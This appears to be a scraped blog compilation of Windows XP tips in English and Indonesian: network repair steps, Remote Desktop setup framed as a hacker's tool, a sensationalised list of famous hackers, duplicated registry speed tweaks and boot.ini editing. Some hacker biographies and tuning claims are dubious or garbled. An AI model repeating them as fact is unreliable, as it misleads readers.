  5346.     * Try automated repair.      Right-click on the broken connection in the Network Connections folder and      choose Repair.
  5347.     * Run the Network Setup Wizard. It walks you step by step through TCP/IP and network configuration and will correct any errors you may have introduced inadvertently.
  5348.     * Reset your router. If you have a home network, the problem may lie with the router or in the connection between the router and your broadband provider. Follow the directions for resetting the router.
  5349.     * Reset your cable modem or DSL      modem. If you have a broadband connection, the problem may lie in the assignment of your IP address by your ISP. Power off your cable modem or DSL modem, unplug its Ethernet cable, and leave it powered off for five minutes. Then restart it. This is also a good time to reset your router. You can also try releasing and renewing after you've turned the connection back on.
  5350.     * Reset TCP/IP to its original      configuration. If all else fails, you can try to reset your TCP/IP stack to the same state that it      was in when XP was first installed on the computer. Use the NetShell      utility.      Issue this command: netsh int ip reset [log_file_name], where log_file_name is the name of a file where the actions taken by      NetShell will be recorded.
  5351.  
  5352. original from : http://www.the-cybers-skills.blogspot.com
  5353. Mengendalikan Komputer dari Jarak Jauh dengan Remote Desktop
  5354. Sunday, May 22, 2011 1:31 AM
  5355. Salam cybers....
  5356.  
  5357. Senjata utama para hacker untuk melakukan cracking ialah aplikasi remote desktop. Kita bisa mengendalikan/mengontrol sebuah komputer dari komputer yang lain dalam lingkungan jaringan komputer lokal / Local Area Network (LAN) maupun lewat jaringan Internet. Tapi bedanya dengan para cracker, dia datang dengan cara bersembunyi-sembunyi lalu mengendalikan computer orang tanpa diketahui. Pada umumnya hanya untuk mengincar file-file system yang berada di direktori windows untuk melakukan penetrasi ke computer tersebut atau mengincar password login admin.
  5358.  
  5359. Syarat untuk bisa mengendalikan komputer orang lain adalah masing-masing komputer harus tersetting software remote desktop software untuk mengendalikan komputer dari jarak jauh ini.
  5360.  
  5361. Pada sistem operasi Windows mulai dari Windows XP, aplikasi Remote Desktop sudah otomatis terinstal pada saat kita menginstal Windows XP tersebut. Namun untuk bisa menjalankannya kita harus melakukan setting terlebih dahulu.
  5362.  
  5363. Untuk menjalankan Remote Desktop, minimal kita butuhkan 2 komputer (PC). Cara melakukan settingnya adalah:
  5364.  
  5365. Untuk memudahkan kita memahami cara setting dan koneksi Remote Desktop, maka saya akan memberina masing2 komputer
  5366.  
  5367. Komputer kita = KLIEN
  5368.  
  5369. Komputer ORANG = SERVER
  5370.  
  5371. Cara Setting di Komputer SERVER
  5372.  
  5373. Klik kanan My Computer dan pilih Properties. klik tab Remote kemudian beri tanda silang/checklist pada tulisan Allow users to connect remotely to this computer. Kemudian klik OK.
  5374.  
  5375. Buka setting Windows Firewall, caranya klik Start > Control Panel > Windows Firewall, kemudian klik tab Exceptipns dan beri tanda checklist pada tulisan Remote Desktop.
  5376.  
  5377.  
  5378.  
  5379. Dan yang terakhir pastikan komputer ini memiliki Password Administrator, jika belum ada cara membuatnya adalah klik Start > Control Panel >User Accounts, kemudian klik nama Useryang memiliki status sebagai Computer Administrator. Klik tulisan Create a password, kemudian masukkan password yang kamu inginkan dan masukkan lagi password yang sama di bawahnya dan klik Create Password. Jika ada pertanyaan Do you want to make your files and folders private? klik tombol Yes, Make Private.
  5380.  
  5381.  
  5382.  
  5383.  Catat IP address komputer ini, caranya klik lambang Internet Connection/Local Area Connection di pojok kanan bawah kemudian klik tab Support dan catat IP Address komputer ini.
  5384.  
  5385.  
  5386.  
  5387.  
  5388.  
  5389.  
  5390. Catat User Name komputer ini caranya klik Start maka user name akan terlihat pada sisi paling atas Start Menu ini jika Start Menu yang kamu gunakan adalah bukan Classic Start Menu.
  5391.  
  5392.  
  5393.  
  5394. Setting di komputer SERVER telah selesai, sekarang kamu sudah bisa melakukan koneksi Remote Desktop dari komputer kamu (CLIENT.
  5395.  
  5396. Cara Melakukan koneksi Remote Desktop dari komputer CLIENT
  5397.  
  5398.  
  5399. -Jalankan aplikasi Remote Desktop Connection, caranya klik Start > All Programs > Accessories > Communications > Remote Desktop Connection.
  5400.  
  5401. -Klik tombol Options >>, masukkan hHstname/alamat IP komputer tujuan, User name dan password komputer tujuan. Misalnya seperti pada gambar di bawah ini, kemudian klik tombol Connect.
  5402.  
  5403.  
  5404.  
  5405. -Jika berhasil, di layar kamu akan tampil desktop yang sama dengan komputer tujuan kamu. Sekarang dari sini kamu sudah bisa melakukan kontrol apa saja dengan menggunakan mouse dan keyboard kamu.
  5406.  
  5407. Selain aplikasi Remote Desktop, ada aplikasi lain yang bisa menjadi alternatif pilihan dengan fitur yang lebih dari sekedar Remote Desktop dan dengan kecepatan yang lebih baik, misalnya Remote Administrator (Radmin) dan Virtual Network Connection (VNC). Oke selamat Mencoba jika ada kesulitan silahkan komentarnya di bawah.
  5408.  
  5409. Catatan:
  5410.  
  5411. Jika komputer tujuan menggunakan koneksi Speedy, maka kamu harus melakukan setting Port Forwarding pada modem ADSL yang digunakan oleh komputer SERVER. Cara setting Port Forwarding tergantung dari merk modem ADSL masing-masing, untuk petunjuknya kamu bisa melihat di http://www.portforward.comsebagai/ bahan referensi. Cari petunjuk yang sesuai dengan merk dan tipe modem ADSL kamu.
  5412.  
  5413. Pada saat terjadi koneksi Remote Desktop, di komputer server tidak bisa melakukan aktifitas karena komputer server akan berada pada posisi Log off. Ini akan berbeda jika kamu menggunakan software lain seperti Radmin dan VNC.
  5414. original from : http://www.the-cybers-skills.blogspot.com
  5415. Hacker-hacker terhebat di dunia
  5416. Saturday, April 23, 2011 10:59 PM
  5417. Inilah Hacker-Hacker terhebat Di Dunia!!
  5418.  
  5419.  
  5420. Dunia hacker sudah dikenal sejak adanya komputer, dan mereka mulai lebih meraja-lela sejak adanya internet.
  5421.  
  5422. Berikut ini ada beberapa Hacker yang paling di Segani Di Dunia
  5423.  
  5424. 1. Kevin Mitnick (lahir Tahun 1963)
  5425.  
  5426.  
  5427. Kevin dikenal karena aksi hackernya yang cukup menghebohkan Amerika, dan merupakan “the most wanted computer criminal in United States history”. Kisah hidupnya sempat di-filmkan sebanyak 2 kali di Hollywood, dengan judul ‘Takedown’ dan ‘Freedom Downtime’.
  5428.  
  5429. Kevin memulai aksi hackernya pertama kali terhadap sistem transportasi di Los Angeles. Setelah berhasil menjebol sistem ‘punchcard’ (pembacaan kartu langganan bus), dia bisa memakai bus kemana saja secara gratis. Aksi berikutnya Kevin adalah menjebol sistem telepon, dimana dia bisa menggunakan layanan telepon jarak jauh dengan gratis.
  5430.  
  5431. Setelah mengenal komputer, Kevin sempat melakukan hacking pada:
  5432.  
  5433. *
  5434.  
  5435. DEC (Digital Equipment Corporation) system
  5436. *
  5437.  
  5438. IBM Mini Komputer di ‘Computer Learning Center Los Angeles
  5439. *
  5440.  
  5441. Hacking sistem Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens
  5442. *
  5443.  
  5444. Mengelabui FBI
  5445.  
  5446. Kevin akhirnya bisa tertangkap dan menjalani hukuman penjara 5 tahun. Dirinya baru dibebaskan pada tahun 2000. Setelah bebas, dia tidak diperbolehkan memakai perangkat telekomunikasi dan telepon hingga tahun 2003. Setelah Kevin menggugat haknya di pengadilan, akhirnya dirinya diperbolehkan menggunakan alat komunikasi dan komputer. Saat ini Kevin bekerja sebagai seorang konsultan sekuriti komputer.
  5447.  
  5448.  
  5449. 2. Adrian Lamo (lahir Tahun 1981)
  5450.  
  5451.  
  5452. Adrian adalah seorang jurnalis dan seorang hacker berpredikat ‘abu-abu’ (bisa baik, bisa jahat), terutama dikenal dalam hacking serangkaian jaringan komputer yang mempunyai tinggi keamanan tinggi. Dirinya mulai dikenal orang setelah berhasil menjebol sistem komputer ‘The New York Times’ pada tahun 2002 dan ‘Microsoft’. Dia juga dikenal dapat mengidentifikasi kekurangan dalam keamanan jaringan komputer dari perusahaan yang termasuk dalam daftar ‘Fortune 500 companies’ dan kemudian memberitahu mereka kelemahan dan celah yang dia ditemukan.
  5453.  
  5454. Kasus ini sempat diteliti oleh FBI selama 15 bulan, setelah New York Times melaporkan adanya sistem mereka yang dijebol. Akhirnya diketahui pada tahun 2003 bahwa penyebabnya adalah Adrian. Adrian sempat bersembunyi beberapa hari, dan akhirnya menyerahkan diri ke FBI pada tahun 2004.
  5455. Adrian akhirnya harus menjalani hukuman ‘tahanan rumah’ oleh orang tuanya, dan 2 tahun masa percobaan dengan denda sekitar $65,000. Adrian juga diyakini berusaha menjebol sistem komputer Yahoo!, Sun Microsystem, Bank of America, dan CitiGroup, dengan memanfaatkan celah keamanan yang ada.
  5456.  
  5457.  
  5458. 3. Jonathan James (lahir Tahun 1983)
  5459.  
  5460.  
  5461. James adalah orang Amerika Serikat termuda yang dijatuhi hukuman atas kejahatan dunia cyber. Saat baru umur 16 tahun dia dikirim ke penjara karena menjebol situs departemen pertahanan Amerika.
  5462.  
  5463. Dirinya mengakui melakukan hacking adalah sebuah tantangan dan merupakan salah satu kesenangan tersendiri. NASA juga kena getah buah dari keisengannya, James berhasil mencuri (download) software NASA yang diperkirakan bernilai $1.7 juta dollar AS pada tahun 1999. NASA harus dipaksa untuk mematikan server dan sistemnya akibat dari perbuatan si James selama tiga minggu. Dan setelah itu NASA harus mengelaurkan biaya sekiatar $41,000 untuk membetulkan sistemnya yang dijebol.
  5464.  
  5465. Enam bulan setelah James menjebol NASA, dia diciduk di rumahnya oleh polisi setempat pada jam 6 pagi. Dia menjalani hukuman penjara 6 bulan karena masih di bawah umur, dan hukuman percobaan ‘tahanan rumah’ hingga umurnya mencapai 21 tahun. James tidak diperbolehkan untuk berinterkasi dengan komputer selama itu.
  5466. James meninggal dunia pada tanggal 18 Mei 2008, tidak ada informasi apa yang menyebabkan kematiannya.
  5467.  
  5468. 4. Kevin Poulsen (Lahir Tahun 1965)
  5469.  
  5470.  
  5471. Juga dikenal dengan Dark Dante, dia melakukan kegiatan hacking database FBI. Selain dia juga melakukan kegiatan hackin di seluruh lines phone station. karena emang kemahiran dia ngehack lewat phone lines (biasa disebut phreaker).
  5472.  
  5473. saat ini, dia jadi senior editor di Wired News, dan berhasil menangkap 744 penawaran sex melalui profiles Myspace..!!
  5474.  
  5475. 5. Robert Tappan Morris (Lahir Tahun 1965)
  5476.  
  5477.  
  5478. Adalah orang yang pertama kali membuat Worm, yang dinamai Morris Worm, melalui internet Morris menyebarkan wormnya yang mengakibatkan sekitar 6000 komputer jadi down..!!!
  5479.  
  5480. Akhirnya Morris dipenjarakan rumah selama 3 tahun dan didenda sebesar $10.500 dollars. Sekarang Morris bekerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory!!
  5481.  
  5482. [QUOTE Hacker Legenda]+Hacker Legendaris
  5483.  
  5484.  
  5485. Karl Koch berasal dari Hannover Jerman yang menamai komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer), dia melakukan beberapa keberhasilan dalam hacking pada kurun waktu 1985-1988. dia juga seorang cocaine addict!!
  5486.  
  5487. dia berhasil membobol beberapa sistem militer AS dan ngehacked sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack’annya dijual ke KGB (Agen Rahasia Uni Soviet)
  5488.  
  5489. dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun banyak juga yang berpendapat, ini merupakan konspirasi tingkat tinggi antara US dan Soviet pada perang dingin!!!
  5490. original from : http://www.the-cybers-skills.blogspot.com
  5491. Speed Up Network Browsing
  5492. Saturday, December 04, 2010 7:09 PM
  5493. Speed up your network browsing by tweaking your registry.
  5494. When you use My Network Places to browse for other machines on your network, it usually takes a long time to display the list of shared resources for the target machine. This is because Windows XP first checks for the scheduled tasks on the target machine before listing the shared resources present on the computer.
  5495. To schedule a task using Windows XP's Scheduled Tasks, choose Start  Programs  Accessories  System Tools  Scheduled Tasks.
  5496.  
  5497. This unnecessary checking can easily add 30 seconds of delay. You can decrease the time browsing takes by modifying the Registry to turn off this checking:
  5498. 1. Invoke the Registry Editor by typing regedit  at the command line.
  5499. 2. Open the Registry key:
  5500. 3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
  5501. Remote Computer\NameSpace
  5502. 4. Delete the following key (the value for it is the Scheduled Tasks,
  5503. {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
  5504. 5. Close the Registry and reboot.
  5505. Figure 5-25. Modifying the registry
  5506.  
  5507. That's it! You should now be able to browse to another computer on the network without much delay.
  5508. original from : http://www.the-cybers-skills.blogspot.com
  5509. Extend the Range of Your Wireless Network
  5510. Saturday, December 04, 2010 7:10 PM
  5511. The efficiency and throughput of WiFi networks can vary dramatically. Make sure you get maximum throughput from your wireless network.
  5512. If you have more than one PC at home, the best way to hook them together and share a high-speed Internet connection is via a wireless network—in particular, one based on the WiFi standard, which is actually a family of standards known under the umbrella term of 802.11x.
  5513. The biggest problem in setting up a home network usually involves running the wires between PCs and a residential gateway. If your PCs are on different floors of the house, you may have to drill holes in your walls, ceiling, and floors and run wire through. Even when PCs are on the same floor, you have to deal with the problem of wires snaking along the floor.
  5514. That's the problem I've had in my 150-year-old home in Cambridge. Drill through a wall, ceiling, or floor here, and you never know what you'll find (horsehair insulation was only one of our many surprises). Even my electrician shudders when he has to take out the drill.
  5515. So, for me, a wireless network was a no-brainer. I now have got half-a-dozen PCs and laptops and three printers in remote parts of the house from each other, all connected via a combination wired/wireless network and sharing a single broadband Internet connection. And when the weather is nice here (twice a year, by my last calculation), I take my laptop out on my back porch and work from there while still connected to the Internet and other PCs and printers in the house.
  5516. But there's a catch with all wireless networks, including mine. Wireless networks rarely deliver data at their rated bandwidth speed. One factor affecting bandwidth speed is the distance between the access point and the wirelessly equipped PC. Compaq, for example, notes that at a distance of 150 feet the throughput of its wireless access point drops from 11 Mbps to 5.5 Mbps, and at a distance of 300 feet it drops to 2 Mbps. Even that significantly understates the drop-off in speed, and most people find that the drop-off is much more dramatic than that, most commonly by a factor of two.
  5517. WiFi and Buying New Equipment
  5518. There are several versions of the 802.11x WiFi standard, and unfortunately, they don't all work with one another. So, when you're buying WiFi equipment such as hubs/routers, make sure they're compatible. The 802.11b standard was the first one to be ratified, is the most common type of WiFi network, and its equipment is the least expensive. (This is the standard commonly used by public wireless "hot spots" in coffee shops, airports, hotels, and other locations.) It operates in the 2.4 GHz part of the spectrum and its maximum throughput is 11 Mbps.
  5519. Increasingly popular, though, is the 802.11g standard, which also operates in the 2.4 GHz part of the spectrum but has a much higher maximum throughput: 54 Mpbs. 802.11b cards will connect to a 802.11g access point, but only at a maximum of 11 Mpbs. However, 802.11g cards can't connect to an 802.11b access point. As of this writing, problems have been reported using 802.11b hardware on an 802.11g network, however. There have been reports of incompatibilities and of the 802.11b hardware slowing the entire 802.11g network down to its slower speed. However, that's because the 802.11g hardware was built when the standard was only a draft and not a final standard. The standard has since been finalized, so if you buy new equipment, you should be safe. Be wary of buying older, used equipment, though.
  5520. Distance is only one factor affecting performance. Interference from other devices and the exact layout of the house or office can also affect it dramatically. However, there are things you can do to extend the range of your network and get more throughput throughout your home:
  5521. •    Centrally locate your wireless access point. This way, it's most likely that all of your wirelessly equipped PCs will get reasonable throughput. If you put it in one corner of the house, nearby PCs may get high throughput, but throughput for others may drop significantly.
  5522. •    Orient your access point's antennas vertically. As a general rule, transmission will be better when antennas are vertical rather than horizontal. Keep in mind, though, that this is only a starting point for positioning its antenna. The exact layout of your house may alter the best positioning of the antenna.
  5523. •    Point the antennas of your wireless PCs toward the access point. Although 802.11 technology does not require a direct line of sight, pointing them in this way tends to increase signal strength. USB wireless cards generally have small antennas that can be positioned, but frequently wireless PC cards don't, so you may have trouble figuring out the antenna orientation in a wireless PC card. If you have a wireless PC card that doesn't have what appears to be an antenna, the antenna is generally located at the periphery of the card itself, so point that at the access point.
  5524. •    Don't place your access point next to an outside wall. If you do that, you'll be broadcasting signals to the outside, not the inside, of the house. That's nice if you want to give your neighbors access to your network, but not great if you want to reach all the PCs in your house.
  5525. •    Avoid putting your access point or PCs near microwave ovens or cordless phones. Many microwave ovens and cordless phones operate in the same 2.4 GHz part of the spectrum as 802.11b WiFi equipment. So, microwave ovens and cordless phones can cause significant interference. Cordless phones tend to be the bigger problem.
  5526. •    Avoid placing the antennas of access points or PCs near filing cabinets and other large metal objects. They can both cause significant interference and dramatically reduce throughput.
  5527. •    Consider using external and booster antennas. Some PC cards, notably Orinoco cards, will accept external antennas that you can buy or build on your own. They have a small connector to which you attach a pigtail and wire and then attach that wire to an antenna. (For information about building your own antenna). Some access points often accept booster antennas that you can buy as well.
  5528.     If you have a Linksys wireless network and are looking to improve its signal strength, you can buy a $99 add-in that promises to extend its range and strengthen its signal. The WSB24 Wireless Signal Booster sits on top of your existing wireless router. You take the antennas off your router, attach them to the booster, then attach the booster to the router via cables. I haven't tried it myself, so I can't personally vouch for it, but those who have tried claim it works.
  5529.  
  5530. •    Try and try again. The ultimate way to find the best placement for your access point and wireless PCs is to continuously experiment and see what kind of throughput you get. Each house and office is so different that no single configuration can suit them all.
  5531. Carefully monitor your throughput as you make these changes, so that you determine the best positioning for your access point and PCs. To determine your true throughput, use the free network analysis program QCheck
  5532.  
  5533. original from : http://www.the-cybers-skills.blogspot.com
  5534. Hack More Power: Registry Hacks to Speed Up XP
  5535. Saturday, December 04, 2010 7:10 PM
  5536. Put your Registry-hacking knowledge to good use: hack your way to running Windows XP at top speed.
  5537. Creating and marketing tuning and customization utilities for the Windows XP operating system is quickly becoming big business. A Google search will turn up hundreds of sites and programs dedicated to tweaking Windows XP. But no matter what type of interface is developed to make system tweaking easier and safer for the average user, the end result is that the changes are reflected in XP by modifying the Registry. For some people, commercial tweaking utilities may be the method of choice, but with a few precautions and safeguards it's possible to enhance system performance without any tools other than those supplied with Windows XP.
  5538. As you learned in you can use Regedit to edit the Registry. Make sure you take the precautions outlined in that chapter and back up your Registry no matter how comfortable you are editing the thing.
  5539. No single tweak is going to take an ancient PC and turn it into a gamer's dream machine. It's even unlikely that a number of tweaks will achieve substantial performance gains, but every little bit does help. As long as you keep your expectations realistic, you'll learn something about the Registry and hopefully see a performance increase in the process.
  5540. 1.Menu Speed
  5541. When XP first appeared, there was a lot of conversation about the new interface, both good and bad. In spite of the initial complaints, most users stick with the default settings rather than reverting to the Classic interface found in previous Windows versions. But you may want to change the delay you notice when you click on the Start Menu. I see no reason for there to be any delay when I click on the Start Menu. Effects are pretty, but I wouldn't click on it if I didn't have business inside, so let's get it open and get moving. The default speed can be adjusted with a quick Registry hack.
  5542. Go to the Registry key HKEY_CURRENT_USER\Control Panel\Desktop\MenuShowDelay. The default value is 400. Set it to 0 to remove the delay completely, but if you do that it will be nearly impossible to move the mouse fast enough not to activate All Programs if you mouse over it en route to your final selection. Pick a number that suits your style, make the change, then test it until you find a good compromise between speed and usability.
  5543. 2. Place Windows Kernel into RAM
  5544. It's a given that anything that runs in RAM will be faster than an item that has to access the hard drive and virtual memory. Rather than have the kernel that is the foundation of XP using the slower Paging Executive functions, use this hack to create and set the DisablePagingExecutive DWORD to a value of 1.
  5545. Perform this hack only if the system has 256 MB or more of installed RAM!
  5546.  
  5547. Edit the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive to 1 to disable paging and have the kernel run in RAM (set the value to 0 to undo this hack). Exit the Registry and reboot.
  5548. 3. Alter Prefetch Parameters
  5549. Prefetching (the reading of system boot files into a cache for faster loading) is a commonly overlooked component that can have a significant impact on system boot time. This tweak allows you to select which components will make use of the prefetch parameters. To see which files are gathered using each of the settings, clear the prefetch cache located at C:\Windows\Prefetch and then enable one of the settings listed in this hack. Clear the cache and repeat for each setting.
  5550. Set the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher to 0 to disable prefetching, 1 to prefetch application launch files, 2 to prefetch boot files, or 3 to prefetch as many files as possible.
  5551. 4. Disable 8.3 Name Creation in NTFS
  5552. Files that use the 8.3 naming convention can degrade NTFS drive performance. Unless you have a good reason for keeping the 8.3 naming convention intact (such as if you're using 16-bit programs), a performance gain can be achieved by disabling it:
  5553. Set the Registry DWORD key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation to 1. Exit the Registry and reboot.
  5554. original from : http://www.the-cybers-skills.blogspot.com
  5555. More Power: Registry Hacks to Speed Up XP
  5556. Saturday, April 23, 2011 11:00 PM
  5557. Put your Registry-hacking knowledge to good use: hack your way to running Windows XP at top speed.
  5558. Creating and marketing tuning and customization utilities for the Windows XP operating system is quickly becoming big business. A Google search will turn up hundreds of sites and programs dedicated to tweaking Windows XP. But no matter what type of interface is developed to make system tweaking easier and safer for the average user, the end result is that the changes are reflected in XP by modifying the Registry. For some people, commercial tweaking utilities may be the method of choice, but with a few precautions and safeguards it's possible to enhance system performance without any tools other than those supplied with Windows XP.
  5559. As you learned in you can use Regedit  to edit the Registry. Make sure you take the precautions outlined in that chapter and back up your Registry  no matter how comfortable you are editing the thing.
  5560. No single tweak is going to take an ancient PC and turn it into a gamer's dream machine. It's even unlikely that a number of tweaks will achieve substantial performance gains, but every little bit does help. As long as you keep your expectations realistic, you'll learn something about the Registry and hopefully see a performance increase in the process.
  5561. 1. Menu Speed
  5562. When XP first appeared, there was a lot of conversation about the new interface, both good and bad. In spite of the initial complaints, most users stick with the default settings rather than reverting to the Classic interface found in previous Windows versions. But you may want to change the delay you notice when you click on the Start Menu. I see no reason for there to be any delay when I click on the Start Menu. Effects are pretty, but I wouldn't click on it if I didn't have business inside, so let's get it open and get moving. The default speed can be adjusted with a quick Registry hack.
  5563. Go to the Registry key HKEY_CURRENT_USER\Control Panel\Desktop\MenuShowDelay. The default value is 400. Set it to 0 to remove the delay completely, but if you do that it will be nearly impossible to move the mouse fast enough not to activate All Programs if you mouse over it en route to your final selection. Pick a number that suits your style, make the change, then test it until you find a good compromise between speed and usability.
  5564. 2. Place Windows Kernel into RAM
  5565. It's a given that anything that runs in RAM will be faster than an item that has to access the hard drive and virtual memory. Rather than have the kernel that is the foundation of XP using the slower Paging Executive functions, use this hack to create and set the DisablePagingExecutive DWORD to a value of 1.
  5566. Perform this hack only if the system has 256 MB or more of installed RAM!
  5567.  
  5568. Edit the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutive to 1 to disable paging and have the kernel run in RAM (set the value to 0 to undo this hack). Exit the Registry and reboot.
  5569. 3. Alter Prefetch Parameters
  5570. Prefetching (the reading of system boot files into a cache for faster loading) is a commonly overlooked component that can have a significant impact on system boot time. This tweak allows you to select which components will make use of the prefetch parameters. To see which files are gathered using each of the settings, clear the prefetch cache located at C:\Windows\Prefetch and then enable one of the settings listed in this hack. Clear the cache and repeat for each setting.
  5571. Set the Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher to 0 to disable prefetching, 1 to prefetch application launch files, 2 to prefetch boot files, or 3 to prefetch as many files as possible.
  5572. 4. Disable 8.3 Name Creation in NTFS
  5573. Files that use the 8.3 naming convention can degrade NTFS drive performance. Unless you have a good reason for keeping the 8.3 naming convention intact (such as if you're using 16-bit programs), a performance gain can be achieved by disabling it:
  5574. Set the Registry DWORD key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation to 1. Exit the Registry and reboot.
  5575. original from : http://www.the-cybers-skills.blogspot.com
  5576. Customize Multiboot Startup Options
  5577. Saturday, December 04, 2010 7:08 PM
  5578.  
  5579.          Edit or create a startup menu that lets you choose which operating system to boot into in multiboot systems, or create a menu that lets you choose different startup options for your single operating system if you have only XP installed.
  5580. If you've installed another operating system (in addition to XP) on your system, your PC starts up with a multiboot menu, which allows you to choose which operating system you want to run. The menu stays live for 30 seconds, and a screen countdown tells you how long you have to make a choice from the menu. After the 30 seconds elapse, it boots into your default operating system, which is generally the last operating system you installed.
  5581. You can customize that multiboot menu and how your PC starts by editing the boot.ini file, a hidden system file, to control a variety of startup options, including how long to display the menu, which operating system should be the default, whether to use the XP splash screen when XP starts, and similar features. And as you'll see later in this hack, you can also use the file to create a startup menu that will allow you to choose from different versions of your operating system—for example, one that you'll use for tracking down startup problems, and another for starting in Safe Mode.
  5582. The boot.ini file is a plain text file found in your root C:\ folder. You might not be able to see it, because it's a system file, and if you can see it, you might not be able to edit it, because it's a read-only file. To make it visible, launch Windows Explorer, choose View  Tools  Folder Options  View and select the radio button "Show Hidden Files and Folders." To make it a file you can edit, right-click on it in Windows Explorer, choose Properties, uncheck the Read-Only box, and click OK.
  5583. 1. Editing Files
  5584. To edit the file, open it with a text editor such as Notepad. Following is a typical boot.ini file for a PC that has two operating systems installed on it—Windows XP Home Edition and Windows Me:
  5585. [boot loader]
  5586. timeout=30
  5587. default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  5588. [operating systems]
  5589. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
  5590. Edition" /fastdetect
  5591. multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /
  5592. fastdetect
  5593. As you can see, there are two sections in the file: [boot loader] and [operating systems]. To customize your menu and startup options, edit the entries in each section. Before editing boot.ini, make a copy of it and save it under a different name (such as boot.ini.old), so that you can revert to it if you cause problems when you edit the file.
  5594. Following are details about how to edit the entries in each section:
  5595. [boot loader]
  5596. This section controls how the boot process works; it specifies the default operating system and how long a user has to make a selection from a boot menu, if a boot menu has been enabled. The timeout value specifies, in seconds, how long to display the menu and wait for a selection before loading the default operating system. If you want a delay of 15 seconds, for example, enter 15 for the value. Use a value of 0 if you want the default operating system to boot immediately. If you want the menu to be displayed indefinitely and stay onscreen until a selection is made, use a value of -1. The default value specifies which entry in the [operating system] section is the default operating system. (The default value is used even if there is only one operating system in the [operating system] section.) To change the default operating system, edit the setting, in our example, to default=multi(0)disk(0)rdisk(0)partition(2)\WINNT.
  5597. So, in our example, if you change the menu settings so that the screen appears for 10 seconds before loading the default operating system, and the default operating system is Windows 2000 Professional, the section reads:
  5598. [boot loader]
  5599. timeout=10
  5600. default=multi(0)disk(0)rdisk(0)partition(2)\WINNT
  5601. [operating system]
  5602. This section specifies which operating systems are present on the computer, and detailed options for each one. XP uses the Advanced RISC Computing (ARC) path to specify the location of the boot partition. In our example, the ARC path is:
  5603. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  5604. The first parameter, which identifies the disk controller, should be 0. The second parameter, the disk parameter, should also be 0. The rdisk parameter specifies the disk number on the controller that has the boot partition. The numbers start at 0. So, if you have three hard disks installed and the second hard disk has the boot partition, the setting is rdisk(1). The partition parameter identifies the partition number of the boot partition. Partitions start with the number 1. The final section, which in our example is \WINDOWS, specifies the path to the folder where the operating system is installed.
  5605. To the right of the ARC path in the example is ="Microsoft Windows XP Home Edition" /fastdetect. The words within quotes are what will appear on the boot menu next to the entry. To customize the text on the menu you can change these words to whatever you wish—for example, "My Favorite Operating System." The /fastdetect switch disables the detection of serial and parallel devices, which allows for faster booting. The detection of these devices isn't normally required in XP, because the functions are performed by plug-and-play drivers, so as a general rule it's a good idea to use the /fastdetect switch. The /fastdetect switch is only one of many switches that can be used in the boot.ini file to customize how the operating system loads.lists others you can use.
  5606. Table 1-1. Switches for boot.ini
  5607. Switch What it does
  5608. /BASEVIDEO Starts XP using the standard VGA driver. It's most useful if you can't boot normally because of a video driver problem.
  5609. /BOOTLOG Logs information about the boot process to the ntbtlogl.txt file in the C:\Windows folder.
  5610. /CRASHDEBUG Loads the debugger at boot, but the debugger remains inactive unless a crash occurs.
  5611. /DEBUG Loads the debugger at boot and runs it.
  5612. /FASTDETECT Disables the detection of serial and parallel devices.
  5613. MAXMEM:n Specifies the maximum amount of RAM that XP can use.
  5614. /NOGUIBOOT Does not allow the XP splash screen to load during boot.
  5615. /NODEBUG Stops the debugger from loading.
  5616. /SAFEBOOT:switch Forces XP to boot into the safe mode specified by the switch parameter, which can be minimal, network, or minimal(alternate shell). In minimal safe mode, only the minimum set of drivers necessary to start XP are loaded. In network safe mode, networking drivers are loaded in addition to the minimum set of drivers. In minimal(alternate shell) the minimum set of drivers are loaded and XP boots into the command prompt.
  5617. /SOS Displays the name of each driver as it loads and gives descriptions of what is occurring during the boot process. It also offers other information, including the XP build number, the service pack number, the number of processors on the system, and the amount of installed memory.
  5618. When you've finished editing the boot.ini file, save it. The next time you start your computer, its settings will go into effect.
  5619. In our example, if we want the menu to appear for 45 seconds, the default operating system to be Windows 2000, and the XP splash screen to be turned off when we choose to load XP, the boot.ini file should look like this:
  5620. [boot loader]
  5621. timeout=45
  5622. default=multi(0)disk(0)rdisk(0)partition(2)\WINNT
  5623. [operating systems]
  5624. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
  5625. Edition" /fastdetect /noguiboot
  5626. multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /
  5627. fastdetect
  5628. 2. Create a Startup Menu Even if You Have Only One Operating System
  5629. Even if you have only one operating system, you can create a boot menu that will let you choose to load your operating system with different parameters. For example, for menu choices, you might have your normal operating system; a mode that lets you trace any startup problems; and Safe Mode. To give yourself the option of operating systems with different parameters, create separate entries for each new operating system choice. For example, for the version of the operating system that traces potential startup problems, you could create this entry:
  5630. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Trace Problems XP Home Edition"
  5631. /fastdetect /bootlog /sos
  5632. This entry creates a startup log and also displays information about the drivers and other operating system information as it loads.
  5633. For the version of the operating system that loads in Safe Mode but that still allows networking, you could create this entry:
  5634. multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Safe Start XP Home Edition" /
  5635. fastdetect /safeboot:network
